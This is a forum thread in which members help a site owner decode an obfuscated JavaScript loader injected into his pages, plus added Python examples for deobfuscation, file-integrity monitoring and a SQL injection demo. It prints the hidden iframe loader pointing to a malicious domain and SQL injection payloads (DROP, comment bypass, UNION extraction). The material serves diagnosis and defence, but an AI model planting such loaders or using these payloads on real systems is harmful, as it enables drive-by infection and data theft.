Has anyone seen this script before?


9 replies to this topic

#1 Paine

Paine

    Will I break 10 posts?

  • Members
  • 4 posts
  • Gender:Male

Posted 17 August 2011 - 07:29 PM

Maybe this is a stupid question, maybe this is the wrong place for this, or maybe somebody knows and can help me out.

<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

OK, so being a noob, I'll just lay out what's going on and hope I don't sound any stupider than I am. This script keeps adding itself to all of my index and start PHP and HTML scripts. I have no idea how this is happening or how to make it stop. My guess was that it was just a redirect that was being injected somehow into the scripts. The odd thing is that it's very inconsistent as to when it's happening: at one point, after I removed the scripts and replaced them with clean ones, it happened after 20 minutes. Another time it took as long as 23 hours. It hasn't affected any files other than the index and start files, so it's being selective; I just don't know why it keeps happening. If you can help me out, I'd appreciate it, or maybe I've just helped you out by giving you a great new script that will help you take over the world. Either way.

-P
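The loader Paine posted builds every meaningful string out of two- and three-character fragments and then glues them back together with `concat`, so the words `iframe`, `src` and the URL never appear in the file. The following Python script is an added example, not code from the thread; it folds those fragments statically (the same thing serrath did by hand in the next post) without executing any of the JavaScript, and prints the DOM calls with the resolved strings substituted back in. It assumes the loader family only uses single-quoted literals and `.concat()`; builders based on `+`, `fromCharCode` or `eval` would need extra cases. URLs are defanged to `hxxp` in the output, following serrath's convention in the thread.

```python
import re

# The injected loader exactly as it appeared in the first post.
INJECTED = (
    "<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';"
    "px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';"
    "cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);"
    "db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);"
    "var ip=document.createElement(se);ip.setAttribute('width','1');"
    "ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);"
    "document.body.appendChild(ip);</script>"
)

# name='literal'   (optionally prefixed with "var")
ASSIGN_LITERAL = re.compile(r"^(?:var\s+)?([A-Za-z_]\w*)='([^']*)'$")
# name=other.concat(a, b, ...)
ASSIGN_CONCAT = re.compile(r"^(?:var\s+)?([A-Za-z_]\w*)=([A-Za-z_]\w*)\.concat\(([^)]*)\)$")
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")


def defang(s: str) -> str:
    """Neutralise URLs the way serrath did in the thread (http -> hxxp)."""
    return s.replace("https://", "hxxps://").replace("http://", "hxxp://")


def analyze(script: str) -> dict:
    """Statically fold the string-building statements of a concat-style loader.

    Nothing is executed: literal assignments and .concat() calls are evaluated
    against a dictionary, and every other statement is kept as an 'action'
    with the folded strings substituted back in for readability.
    """
    body = re.sub(r"</?script>", "", script, flags=re.I)
    env: dict[str, str] = {}
    actions: list[str] = []
    for stmt in (s.strip() for s in body.split(";")):
        if not stmt:
            continue
        m = ASSIGN_LITERAL.match(stmt)
        if m:
            env[m.group(1)] = m.group(2)
            continue
        m = ASSIGN_CONCAT.match(stmt)
        if m:
            name, base, args = m.groups()
            pieces = [env[base]] + [env[a.strip()] for a in args.split(",") if a.strip()]
            env[name] = "".join(pieces)
            continue
        actions.append(stmt)

    def inline(stmt: str) -> str:
        # Replace identifiers that name a folded string with the quoted value.
        # (A literal that happens to equal a variable name would also be hit;
        # acceptable for triage, not for a general JS rewriter.)
        return IDENT.sub(lambda m: repr(env[m.group(0)]) if m.group(0) in env else m.group(0), stmt)

    return {
        "strings": env,
        "actions": [defang(inline(a)) for a in actions],
        "urls": sorted({defang(v) for v in env.values() if v.startswith(("http://", "https://"))}),
    }


if __name__ == "__main__":
    report = analyze(INJECTED)
    print("Resolved URLs:", *report["urls"])
    print("What the loader does once the strings are folded:")
    for action in report["actions"]:
        print("  " + action + ";")
```

Running it shows the loader creating a 1x1 `iframe`, setting its `src` to the folded URL and appending it to the body, which is the whole point of the obfuscation: the file reads as noise to a grep for `iframe` or the hostname, but the browser sees a plain drive-by frame.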

#2 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Gender:Male

Posted 18 August 2011 - 12:03 AM

<script>
var ip=document.createElement('iframe');
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;
ip.setAttribute('src','hxxp://zirycatum.com/k985ytv.htm');
document.body.appendChild(ip);
</script>


Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...

Edited by serrath, 18 August 2011 - 12:03 AM.


#3 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Gender:Male
  • Location:way up north eh

Posted 19 August 2011 - 06:09 PM

    <script>
    var ip=document.createElement('iframe');
    ip.setAttribute('width','1');
    ip.setAttribute('height','1');
    ip.frameBorder=0;
    ip.setAttribute('src','hxxp://zirycatum.com/k985ytv.htm');
    document.body.appendChild(ip);
    </script>

    Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...



When going to zirycatum.com it gives me:

403 Forbidden

nginx




DNS records:

Site:                    http://zirycatum.com
Domain:                  zirycatum.com
IP address:              178.17.163.92
Country:                 MD
Netblock owner:          Spenelli Media Inc.
Nameserver:              ns1.zirycatum.com
DNS admin:               hostmaster@zirycatum.com
Reverse DNS:             178-17-163-92.static-host.net
Date first seen:         unknown
Last reboot:             unknown
Site rank:               unknown
Domain Registrar:        unknown
Organisation:            unknown
Nameserver Organisation: unknown



The actual link has no data; it's just a blank page. Most likely it was formerly hosting malware.

#4 serrath

serrath

    SUP3R 31337

  • Members
  • 181 posts
  • Gender:Male

Posted 19 August 2011 - 10:52 PM

Brave soul.

#5 Paine

Paine

    Will I break 10 posts?

  • Members
  • 4 posts
  • Gender:Male

Posted 20 August 2011 - 05:14 PM

Wow, thanks guys. I was kind of thinking that's what it was, but I've never seen anything like that before so I couldn't make heads or tails of it.
Again thanks

-P

#6 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 23 August 2011 - 09:04 AM

Nice bit of obfuscation.

When you say "adds itself to my index page", do you mean that if you pull up the index file in a text editor the above code appears in it? If so, your server is backdoored somehow by a process that has write permissions to those files, and until you fix the hole it's just going to keep popping back to insert its edits.

If you say what software stack (e.g. LAMP, SAMP, etc.) you are using and what version (but don't reveal your URL, or some may actively help you notice the problem by p0wnage; this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broken into one of the network daemons the oldschool way and rootkitted it...

#7 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 399 posts
  • Gender:Male
  • Location:way up north eh

Posted 23 August 2011 - 03:22 PM

    Brave soul.



I opened the page in a sandboxed web browser.. safe enough, especially since the computer isn't mine ;P

#8 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 24 August 2011 - 03:50 AM

wget with the UA string set to the most exploitable version of IE you can think of is pretty useful too. It's interesting switching the UA round versions and between IE and Firefox and getting different payloads too.

#9 Paine

Paine

    Will I break 10 posts?

  • Members
  • 4 posts
  • Gender:Male

Posted 24 August 2011 - 07:16 AM

    Nice bit of obfuscation.

    When you say "adds itself to my index page", do you mean that if you pull up the index file in a text editor the above code appears in it? If so, your server is backdoored somehow by a process that has write permissions to those files, and until you fix the hole it's just going to keep popping back to insert its edits.

    If you say what software stack (e.g. LAMP, SAMP, etc.) you are using and what version (but don't reveal your URL, or some may actively help you notice the problem by p0wnage; this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

    Or someone could have just broken into one of the network daemons the oldschool way and rootkitted it...

Yes, sorry, I guess I forgot to put that in. When I opened the file in a text editor I found the script added in at the bottom of the page. My guess was it was an injection of some kind or another, although I'm not really sure I understand how those work lol. I guess we're running LAMP, and the only version I can remember is PHP 5, on CentOS with WHM on there too if that helps. After basically just messing with a few things (this is how I do everything, I never actually know what I'm doing till at least the third time, yeah I'm a noob) I found that the perms on the PHP and HTML left them open to user modification. I turned that off and it stopped happening.

#10 phaedrus

phaedrus

    Gibson Hacker

  • Members
  • 90 posts
  • Gender:Male

Posted 06 September 2011 - 08:03 AM

Warning, Caution, Mayday! Don't put anything whose confidentiality you value to any degree on that server as is.

While that's generally a good rule for any internet-facing webserver if possible, someone has managed to get filesystem-level access to that web server and you have no way of knowing what else they changed when they had that.
They could have left other processes and backdoors on the system sleeping, and while you've closed the automated spambot-injecting one, they could be popping back to see if there's any information they could harvest manually that could generate money for them, or be using it as an attack launchpad at some level undetectable to you and your current toolkits. There's a whole genre of software designed to be installed post-hacking by the hackers to enable them to keep a level of control over it. Google rootkit. Or invisible rootkit. Or read round here.

Seriously, treat it as still completely compromised, because as far as you know it still is. If something gets broken into, the content you generate should be backed up and the whole server nuked and reinstalled, then patched against whatever you find before it goes back onto the internet. If it's a virtual server, they can probably reimage in minutes, and you can get exclusive access to make your config changes via an alternative IP. Depends on how receptive the hosting company is. Two of mine are great, and the third doesn't give a s*** and won't assist even with security stuff they have caused which the fix on would be to their benefit. Maybe that's why they are a quarter of the price, so I just use that box for low-importance hosting of bulk volume stuff.

I run tripwire on the servers I care about lots, amongst various other monitoring tools, and I can check what's been altered if they get attacked because it takes a cryptographic sum of the entire machine less a few directories which change often and don't hold binaries or config. And even if I ran the checksum check post successful intrusion as identified by other monitoring tools on there, I'd still pull that server from service and nuke it from orbit.

For the SQL injection, basically a simplified summary is: typically the webserver takes in POST data from a form somehow, say a search box or username etc., and it doesn't check for unsafe chars in the input or overlong data lengths, or the source of the POST (some mad fools do their sanitization in JavaScript client side, in which case it's trivial to just make a new page up with their parameter names in and bypass every control or safety measure they put in).
The server hands this data off to the SQL server, which starts parsing through the data. So let's give a simple example. Some of this syntax might be a bit wobbly because I'm writing it off the top of my head, but it outlines the general act.
A username box is entered with "'; DROP database mysql;" and posted to your webserver. The webserver hands it to MySQL, which comes along and parses the name contents, which ends up as a DROP DATABASE command once the first ` closes the original query. If your webserver is running with full privileges over your MySQL database, it could result in instant complete deletion. Of course most attackers don't want to make a noise, so instead it's more common to do a select * and attempt to extract information stored in there with the same method, or inject new users in to connect with etc. I've seen this work against commercial products, so don't feel too ashamed if you find it too. Most of the open source forums etc. are fairly well tested by now, but they do have the occasional vuln identified, so it's always good practice to stay with as new a version as you can with them, ditto for the rest of your software stack if you have any control over it.
Not many people would blow a 0-day on a forum about donkey saving or something; it's mostly known exploits months or years old for that level.


Bit of a learning curve to take all the above in quickly and understand it, but you'll get there if you want to.
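The two concrete things this thread turned up are that the injected files changed under Paine's feet on an irregular schedule, and that their permissions left them writable to other users. phaedrus's Tripwire approach (a stored cryptographic sum of the tree, compared later) catches the first; a permission sweep catches the second. The following Python script is an added example, not code from the thread or from Tripwire: it baselines a web root with SHA-256, reports added, removed and modified files, checks modified pages for a `<script>` block appended after `</html>` (a heuristic chosen from Paine's report that the code showed up at the bottom of the page; it is not an IOC the thread states), and lists world-writable files. `demo()` replays the scenario in a temporary directory with constructed files and a constructed sample payload whose `attacker.invalid` hostname is a placeholder, not the domain from the thread.

```python
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Files an attacker with write access to a web root typically edits.
WATCHED_SUFFIXES = {".php", ".html", ".htm", ".js"}

# Heuristic for this thread's symptom: a <script> block appended after the
# document has already been closed. Legitimate pages rarely do that.
TRAILING_SCRIPT = re.compile(r"</html>\s*<script\b.*?</script>", re.I | re.S)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root: Path) -> dict:
    """Hash every watched file under root. Store the result off the box:
    an attacker who can edit index.html can edit a baseline kept beside it."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES
    }


def compare(root: Path, base: dict) -> dict:
    """Diff the current tree against a stored baseline."""
    now = baseline(root)
    return {
        "added": sorted(set(now) - set(base)),
        "removed": sorted(set(base) - set(now)),
        "modified": sorted(k for k in now if k in base and now[k] != base[k]),
    }


def trailing_scripts(path: Path) -> list:
    """Return the <script> blocks that sit after </html> in the file."""
    return TRAILING_SCRIPT.findall(path.read_text(errors="replace"))


def world_writable(root: Path) -> list:
    """Files any local account (a neighbouring site's PHP, say) may overwrite."""
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and (p.stat().st_mode & 0o002)
    )


# Constructed sample injection; the hostname is a placeholder, not the thread's.
SAMPLE_INJECT = (
    "<script>var ip=document.createElement('iframe');"
    "ip.setAttribute('src','hxxp://attacker.invalid/loader.htm');"
    "document.body.appendChild(ip);</script>"
)


def demo() -> dict:
    """Replay the thread's scenario in a temp dir: clean baseline, then an append."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body>hello</body></html>\n")
        (root / "start.php").write_text("<?php echo 'start'; ?>\n")
        (root / "style.css").write_text("body { margin: 0 }\n")  # not a watched type
        base = baseline(root)
        (root / "start.php").chmod(0o666)  # the permission problem Paine found
        with (root / "index.html").open("a") as f:  # what the attacker's process did
            f.write(SAMPLE_INJECT + "\n")
        diff = compare(root, base)
        return {
            "diff": diff,
            "trailing_scripts": {k: len(trailing_scripts(root / k)) for k in diff["modified"]},
            "world_writable": world_writable(root),
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run `baseline()` once on a known-clean tree and keep the JSON somewhere the web server's account cannot write; run `compare()` from cron and alert on any non-empty list. As phaedrus says, a hit tells you the box needs rebuilding, not which file to clean.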


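phaedrus's SQL injection summary above, as an added example in Python with an in-memory SQLite table (not code from the thread): the same login query written the vulnerable way, with form input pasted into the SQL text, and the parameterised way. The table, accounts and payloads are constructed for the demo. His `'; DROP database mysql;` example relies on stacked statements, which Python's `sqlite3.execute()` refuses (it runs one statement at a time), so the demo uses the quieter forms he also mentions: a comment that cuts off the password check, and a `UNION` that pulls another column out. Against a driver that accepts stacked statements the DROP form fails and succeeds in exactly the same places.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a forum's user table (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", 1), ("bob", "hunter2", 0)],
    )
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, password: str):
    """The pattern phaedrus describes: the POSTed value becomes part of the SQL text,
    so quotes, comments and UNIONs in it are parsed as SQL by the database."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, name: str, password: str):
    """Same query with bound parameters: the values travel beside the statement
    and are compared as data, never parsed as SQL. Length checks and allow-lists
    still belong server-side, but they are no longer what stands between the
    attacker and the database."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = con.execute(sql, (name, password)).fetchone()
    return row[0] if row else None


# Constructed payloads typed into the username box, password left as junk.
BYPASS = "alice' --"                                                  # comments out the password check
EXTRACT = "' UNION SELECT password FROM users WHERE name='alice' --"  # reads another column back


if __name__ == "__main__":
    con = make_db()
    for label, login in (("string-built", login_vulnerable), ("parameterised", login_safe)):
        print(f"{label:13} bypass  -> {login(con, BYPASS, 'wrong')!r}")
        print(f"{label:13} extract -> {login(con, EXTRACT, 'wrong')!r}")
```

With the string-built query the bypass logs in as alice without her password and the extraction payload returns her password in the place of a username; the parameterised version returns nothing for both and still logs bob in with his real credentials.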


BinRev is hosted by the great people at Lunarpages!